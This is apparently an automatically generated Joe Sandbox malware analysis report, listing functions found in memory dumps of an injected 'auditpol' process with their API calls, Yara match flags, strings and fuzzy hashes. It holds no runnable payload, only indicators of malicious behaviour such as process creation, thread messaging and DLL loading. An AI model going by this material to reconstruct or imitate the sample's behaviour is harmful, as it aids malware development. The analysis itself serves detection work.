Function 03692D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692D3A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f7feb44377ef8f8a86f7a3072ff3c4f57f199ab1af8c61528c165da45742040
Instruction ID: c03c691eb8eae16f9715f289626da088a1e04ce4709df8ef6e2ed3a2dbdeddcc
Opcode Fuzzy Hash: 3f7feb44377ef8f8a86f7a3072ff3c4f57f199ab1af8c61528c165da45742040
Instruction Fuzzy Hash: 8890026170180403D140B59C54186064405D7E1301F55D011E1414654DDA559D565622

Function 03692D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692D1A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fe81c7a052e066234868b58337fd0896dcbd24d3f09712155799057394a8ddb
Instruction ID: 729871ea2ba3dd46282a6cd27fa9a856fa3b39e68a3350cdfe5abaa6fbd01144
Opcode Fuzzy Hash: 6fe81c7a052e066234868b58337fd0896dcbd24d3f09712155799057394a8ddb
Instruction Fuzzy Hash: F790026971380402D180B59C540860A040587D1202F95D415A1015658DCA559D695721

Function 03692DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692DFA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5de92ec2074d23ef680207bac0b990acfaef59342ecfbcf66ff0ec216d46f995
Instruction ID: da9c42e9a1589b764fe5da6df75ea06adcc73b8fb4ba47418834b6110b3d25ad
Opcode Fuzzy Hash: 5de92ec2074d23ef680207bac0b990acfaef59342ecfbcf66ff0ec216d46f995
Instruction Fuzzy Hash: 2690027170180813D111B59C4504707040987D0241F95C412A1424658E97969E52A521

Function 03692DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692DDA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d11b0a530588a8a07a28e034e5f3b19b6f7dac451b9f2a55d4b4896c292bf1f7
Instruction ID: ecebf15bc5e9d29f93ac57e68910b917a362228dbc996d02bbbaca34f7417f61
Opcode Fuzzy Hash: d11b0a530588a8a07a28e034e5f3b19b6f7dac451b9f2a55d4b4896c292bf1f7
Instruction Fuzzy Hash: 76900261742845525545F59C4404507440697E0241795C012A2414A50D8666AD56DA21

Function 03692C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692C6A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77c7d9d9fd3363ad47664cde71ad6b1d2f689152a8c0889b7a5e71faea99acab
Instruction ID: 92459c5384a1a043e8a52f6adf213e12288fac585b1d73e18feee5f7ddd938e9
Opcode Fuzzy Hash: 77c7d9d9fd3363ad47664cde71ad6b1d2f689152a8c0889b7a5e71faea99acab
Instruction Fuzzy Hash: CD90027170180C42D100B59C4404B46040587E0301F55C016A1124754E8755DD517921

Function 03692C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692C7A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 241856833c53d18445833185abb6539a6053b2b9cb752e1a1b46e1c722ce768f
Instruction ID: ee80b61c53f07c595ace8d6b2389735f850f6c994b070726761813566085a250
Opcode Fuzzy Hash: 241856833c53d18445833185abb6539a6053b2b9cb752e1a1b46e1c722ce768f
Instruction Fuzzy Hash: E190027170188C02D110B59C840474A040587D0301F59C411A5424758E87D59D917521

Function 03692CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692CAA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2720ecee357c0842dbf70fdb7909618479beab35141ca5b1b63f218b5b72923
Instruction ID: 3e00040261a76c4974d58e2a11b880dbf02093382139358a3fe7f7702fea4789
Opcode Fuzzy Hash: d2720ecee357c0842dbf70fdb7909618479beab35141ca5b1b63f218b5b72923
Instruction Fuzzy Hash: 6990027170180802D100B9DC5408646040587E0301F55D011A6024655FC7A59D916531

Function 029B0907 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

23X395L, xrefs: 029B0A4E, 029B0A51
23X395L, xrefs: 029B0A3C, 029B0A46, 029B0A57

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID:
String ID: 23X395L$23X395L
API String ID: 0-1829949781
Opcode ID: 0d1e6efdca629da87634778973e686e6b2a430831b47a9d148f49c82600405b8
Instruction ID: 85cea92689c50fd6cbf8d8fc4f84b4bac55dd281d9270fde832c1974e29cf420
Opcode Fuzzy Hash: 0d1e6efdca629da87634778973e686e6b2a430831b47a9d148f49c82600405b8
Instruction Fuzzy Hash: F831BC729002497BDB128BA49C819DFBF6CDFAA360B1485D9E848B7102D6264A07CBE1

Function 029B09C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(23X395L,00000111,00000000,00000000), ref: 029B0A47

Strings

23X395L, xrefs: 029B0A4E, 029B0A51
23X395L, xrefs: 029B0A3C, 029B0A46, 029B0A57

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 23X395L$23X395L
API String ID: 1836367815-1829949781
Opcode ID: 325ff95f4e63364f2d787e380225cedf296742ec400729cbb21bd059a0d4bf92
Instruction ID: f797be95ecbaa8efa81d0375a0a582c39fc13fad70228af396de7465bcc4877d
Opcode Fuzzy Hash: 325ff95f4e63364f2d787e380225cedf296742ec400729cbb21bd059a0d4bf92
Instruction Fuzzy Hash: B801C8B2D4025C7AEB019AE49C91DEF7B7CEF51394F04C069F908B7101D6244E068BA1

Function 029B09D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(23X395L,00000111,00000000,00000000), ref: 029B0A47

Strings

23X395L, xrefs: 029B0A4E, 029B0A51
23X395L, xrefs: 029B0A3C, 029B0A46, 029B0A57

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 23X395L$23X395L
API String ID: 1836367815-1829949781
Opcode ID: 0cbf82e7df64f83c89738de847bae8daec55e50869c0ae87753f5f3001111fcd
Instruction ID: bbee10badbc268d16ab4d34cfae0fef7f27fe478b805388f23508c401bebb346
Opcode Fuzzy Hash: 0cbf82e7df64f83c89738de847bae8daec55e50869c0ae87753f5f3001111fcd
Instruction Fuzzy Hash: 920184B2D4021C7ADB11AAE49C91DEF7B7CEF91794F04C069FA08A7141D6249E068BB1

Function 029BF1EA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 029BF207
CoUninitialize.COMBASE ref: 029BF2EE

Strings

@J7<, xrefs: 029BF21B

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 12fa5c3c1dc1d92cf1e57f3f97fbc8af3350f071f5156f247114de178b1ceeb8
Instruction ID: bc5e5273318696cbe63d5fb14eb478e638920633c54c26fbdf7b53a96165cfd1
Opcode Fuzzy Hash: 12fa5c3c1dc1d92cf1e57f3f97fbc8af3350f071f5156f247114de178b1ceeb8
Instruction Fuzzy Hash: 08311CB5A0060AAFDB00DFD8CC809EFB7B9FF88304B108559E515AB214D775EE058BA0

Function 029BF1F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 029BF207
CoUninitialize.COMBASE ref: 029BF2EE

Strings

@J7<, xrefs: 029BF21B

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: f8f9fda138d1425857176d44d805a4f0283cdec70673baed7ba893ffb25f7fd9
Instruction ID: cb5244d0a94e880a7382ab0ec231c7ff8eb23fc30d7bac0b7b34f0d63a019fbc
Opcode Fuzzy Hash: f8f9fda138d1425857176d44d805a4f0283cdec70673baed7ba893ffb25f7fd9
Instruction Fuzzy Hash: 39310DB5A0060AAFDB00DFD8DC809EFB7B9FF88304B108559E515AB214D775EE45CBA1

Function 029C37C0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 029C389B

Strings

wininet.dll, xrefs: 029C382E, 029C383A

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: wininet.dll
API String ID: 3472027048-3354682871
Opcode ID: bbaa36fc3d655a5ea132636f60e0bcb04db4eaeb48d8e4965af6cad283d4f726
Instruction ID: 8cd717f21e857d8a210611683e815ebc69434e8b270bf1443a41206ff0904377
Opcode Fuzzy Hash: bbaa36fc3d655a5ea132636f60e0bcb04db4eaeb48d8e4965af6cad283d4f726
Instruction Fuzzy Hash: 73318EB1600605BBD714DF64C880FEBBBBDFB8C704F64855CE659AB240C770AA50CBA5

Function 029B4260 Relevance: 1.6, APIs: 1, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 029B4252

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1eb541e0435780811985e4cce447ba907fed2a2e16a91d9941b2ea156863ad24
Instruction ID: 95a4b6b6a8420928cdabc4683cc46d01ab144b86906d6ef1c564fd77bde8667a
Opcode Fuzzy Hash: 1eb541e0435780811985e4cce447ba907fed2a2e16a91d9941b2ea156863ad24
Instruction Fuzzy Hash: AC21CE32D052099FCB11DE54C964EE6BB78FF84724F00419DED198B283E7309516E7D4

Function 029B41E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 029B4252

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b5941047abcb2dd0c0d4caa8a322ddd4714e5f804c4b6bfaa926e623e5ba137e
Instruction ID: 0c900eb937d13ff17fe484cb3f86cc3d0136fb145541ccc6dca2ec2845647368
Opcode Fuzzy Hash: b5941047abcb2dd0c0d4caa8a322ddd4714e5f804c4b6bfaa926e623e5ba137e
Instruction Fuzzy Hash: 7E015EB5D4020DABDF10EAE0DD41FDEB7B99F84308F1041A9E91CA7241F631E7089B92

Function 029C94E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,029B7FFE,00000010,?,?,?,00000044,?,00000010,029B7FFE,?,?,?), ref: 029C9540

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: d62756590057dc74e7b6022822720fb4b28a7a3beccf7ef8b3262fef21370851
Instruction ID: 970452293fc3840efac6102b388ca97b18a495214c8f926a1937ef14f50e4110
Opcode Fuzzy Hash: d62756590057dc74e7b6022822720fb4b28a7a3beccf7ef8b3262fef21370851
Instruction Fuzzy Hash: 2201C0B2204608BBCB44DE89DC80EEB77ADAF8D754F518108BA09E3240D630F8518BA4

Function 029A9AD0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 029A9B15

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fd1b3630e4834be98d6d51edbc2af125f58af8d241f93d19fc610308dbfe8bf9
Instruction ID: c0e0de41bc5c8d83efa7edec9f4c2d68d16aef2cc9fe7225f6d6c01cb613bd2d
Opcode Fuzzy Hash: fd1b3630e4834be98d6d51edbc2af125f58af8d241f93d19fc610308dbfe8bf9
Instruction Fuzzy Hash: 8AF0653338030436E36472A9AC02FDB769DEBC0B61F24042AF70CDB1C4D991B54247E5

Function 029A9ACE Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 029A9B15

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 13d15408bba3dca03a401e74db7b30dabcc2939a107c3e6522786a36cbc2ace7
Instruction ID: 41d730220d74ee19e5129c8ad8318b8b578c0f857b848e46ddfba2c94ace75bd
Opcode Fuzzy Hash: 13d15408bba3dca03a401e74db7b30dabcc2939a107c3e6522786a36cbc2ace7
Instruction Fuzzy Hash: 5CF0923228030437E27472A99C12FDB7A9DEFC5B60F240429F74CAB1C4D991B54287E9

Function 029C9400 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(029B1669,?,029C5C2B,029B1669,029C53AF,029C5C2B,?,029B1669,029C53AF,00001000,?,?,?), ref: 029C943C

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c8f9a39011208eef6f2c2b8b2b7c5f33530cc342eb2c6212f62236e168b0262c
Instruction ID: cce0c8a7c6de289166d500eef866170160408ee8f28caece7027d20d6fc3003d
Opcode Fuzzy Hash: c8f9a39011208eef6f2c2b8b2b7c5f33530cc342eb2c6212f62236e168b0262c
Instruction Fuzzy Hash: F4E065B22002097FDA10EE59EC80FAB77EDEFC9710F008019FA0CA7241C630B8118BB8

Function 029C9450 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D8905C6,00000007,00000000,00000004,00000000,029B3A5C,000000F4), ref: 029C948F

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c4220b52d66a6df406a0f7ede6a08c4099ef5fbd99dca7745e785d217876d4ff
Instruction ID: a4b81867888f6448f9731c662fdc2376eaddc4b45b15defc95ff3d69c7324546
Opcode Fuzzy Hash: c4220b52d66a6df406a0f7ede6a08c4099ef5fbd99dca7745e785d217876d4ff
Instruction Fuzzy Hash: E0E065B22043097FC610EE99DC40FAB37ADEFC9710F408019F908A7241CA30B8118BB4

Function 029B8040 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 029B806C

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ab1eedb68456cfe42224fae7e44c792cf0a5dd0eefb62e803a715c518642da40
Instruction ID: dcd88284cdc9b683faca80663367a81d116236dba7b385c205830c5365ef217c
Opcode Fuzzy Hash: ab1eedb68456cfe42224fae7e44c792cf0a5dd0eefb62e803a715c518642da40
Instruction Fuzzy Hash: DDE0D83514020416E72465A8DD41BE1334CBF48EA4F184660B85C8B1D2D675E5018291

Function 029B7E27 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,029B1970,029C7CEF,029C53AF,029B1933), ref: 029B7E63

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5af62a16168ef666c7bcf7bb0498e431b39a4f835f8f4a7c7ccdece24ebb82b6
Instruction ID: fa40408dd934d22227eff7f3746dc4327ce38208625f7adc37d7553d1929f742
Opcode Fuzzy Hash: 5af62a16168ef666c7bcf7bb0498e431b39a4f835f8f4a7c7ccdece24ebb82b6
Instruction Fuzzy Hash: FAE0C2766943006AE658A7A4DC02FA626DDAB90704F088068B44CD73C6ED25D5018AA8

Function 029B7E30 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,029B1970,029C7CEF,029C53AF,029B1933), ref: 029B7E63

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d51723e9311365bd264bfe5c4936500df88cede3c4b216ccbfc1b5c932f508ee
Instruction ID: 35706e136be60041250304ca9f18af7814b5752239ec0d973fc160ad7fd8253c
Opcode Fuzzy Hash: d51723e9311365bd264bfe5c4936500df88cede3c4b216ccbfc1b5c932f508ee
Instruction Fuzzy Hash: 72D05E762903043BEA44B6E4DC12F96368DAF80B54F198468B98CDB3C2ED65E5008AE5

Function 03692C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692C24

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 249e493167de0bbdf4ce5ed7f597589b53ca34278d45d9f9222eb3c3da559b69
Instruction ID: 0c352f9959db394fc875437bc394fc76c0daa50f3b662e52180f4c330bc03d4d
Opcode Fuzzy Hash: 249e493167de0bbdf4ce5ed7f597589b53ca34278d45d9f9222eb3c3da559b69
Instruction Fuzzy Hash: B0B09B71D019C9D5EE51E76447087177D0467D1701F19C462D3030751F4779D5D1E575

Non-executed Functions

Function 034704DE Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4129781992.0000000003470000.00000040.00000800.00020000.00000000.sdmp, Offset: 03470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3470000_auditpol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57561bc7d7e0b388931dcef2c2706747636cad0cc3b727bb3cb5185be66a928
Instruction ID: 21cd8843bb795fa6bc2645b0fe4f007fc31a037a2f778c92100684a52e235f84
Opcode Fuzzy Hash: e57561bc7d7e0b388931dcef2c2706747636cad0cc3b727bb3cb5185be66a928
Instruction Fuzzy Hash: DA41087451DB0D4FD368EF6990816B7B3E1FB85300F54062ED886CB352EB70D8468789

Function 029ADDE5 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7cc62a40543477590371953dde44f8a48f65b6c0301ba8d23159e4e5b0e7418
Instruction ID: 4eb588f29bcd8143942a2859395d120f9deffdade70d80515e9db2bd879154e7
Opcode Fuzzy Hash: c7cc62a40543477590371953dde44f8a48f65b6c0301ba8d23159e4e5b0e7418
Instruction Fuzzy Hash: A6C01275526405A6C115586EEC411B4F364D75B234F112392B954D74A08A53D4638198

Function 0347DE7B Relevance: 57.7, Strings: 46, Instructions: 212COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0347DFF6
@@@@, xrefs: 0347DFE8
@@@@, xrefs: 0347E027
)*+,, xrefs: 0347DF6A
@@@@, xrefs: 0347E019
!"#$, xrefs: 0347DF5C
@@@?, xrefs: 0347DEF3
@@@@, xrefs: 0347DF8D
@@@@, xrefs: 0347E058
@@@@, xrefs: 0347E03C
@@@@, xrefs: 0347DFCC
@@@@, xrefs: 0347DF0F
@@@@, xrefs: 0347DF47
@@@@, xrefs: 0347DFB7
%&'(, xrefs: 0347DF63
@@@@, xrefs: 0347DFA2
@@@@, xrefs: 0347DFC5
@@@@, xrefs: 0347DFBE
@@@@, xrefs: 0347E004
@@@@, xrefs: 0347DF7F
@@@@, xrefs: 0347DF86
@@@@, xrefs: 0347DFA9
?, xrefs: 0347E070
@@@@, xrefs: 0347E051
@@@@, xrefs: 0347E035
@@@@, xrefs: 0347E05F
@@@@, xrefs: 0347DFFD
@@@@, xrefs: 0347E012
@@@@, xrefs: 0347E02E
@@@@, xrefs: 0347DFD3
@@@@, xrefs: 0347E020
4567, xrefs: 0347DEFA
@@@@, xrefs: 0347DFB0
123@, xrefs: 0347DF78
89:;, xrefs: 0347DF01
@@@@, xrefs: 0347DFDA
@@@@, xrefs: 0347DF9B
@@@@, xrefs: 0347E04A
@@@@, xrefs: 0347DFE1
<=@@, xrefs: 0347DF08
@@@@, xrefs: 0347DFEF
@@@@, xrefs: 0347E043
@@@@, xrefs: 0347E00B
-./0, xrefs: 0347DF71
@, xrefs: 0347DF16
@@@@, xrefs: 0347DF94

Memory Dump Source

Source File: 0000000A.00000002.4129781992.0000000003470000.00000040.00000800.00020000.00000000.sdmp, Offset: 03470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3470000_auditpol.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3754132690
Opcode ID: 5dfa38026fd4188667aa59a6bbf4829f1721ce34b33225beb86881193cceb585
